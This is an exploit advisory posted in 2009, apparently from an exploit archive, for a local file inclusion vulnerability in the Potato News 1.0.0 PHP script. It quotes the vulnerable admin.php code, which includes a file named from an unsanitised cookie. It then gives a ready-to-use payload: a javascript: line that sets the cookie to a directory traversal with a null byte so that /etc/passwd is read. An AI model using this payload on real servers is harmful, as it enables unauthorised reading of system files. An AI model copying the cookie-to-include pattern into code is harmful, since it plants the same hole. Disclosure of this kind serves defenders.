potatonews-lfi.txt
Posted on 10 February 2009
######################################################################################### [0x01] Informations: Name : Potato News 1.0.0 Download : http://potato-news.googlecode.com/files/potatonews-1.0.0.zip Vulnerability : LFI Author : x0r Contact : andry2000@hotmail.it Notes : Proud to be Italian ######################################################################################### [0x02] Bug: Bugged file is /[path]/admin.php [Code] <?PHP if (isset($_COOKIE["user"])) { $id = $_COOKIE["user"]; if (file_exists("data/users/$id.php")) { include ("data/users/$id.php"); if ($usaavatar == "") { echo "<img height='75px' width='75px' src='images/noav.jpg'/>"; } else { echo "<img height='75px' width='75px' src='$usaavatar'/>"; } } [/code] ######################################################################################### [0x03] Exploit: Exploit: javascript:document.cookie = "user=../../../../../../../../../../etc/passwd%00; path=/" ########################################################################################
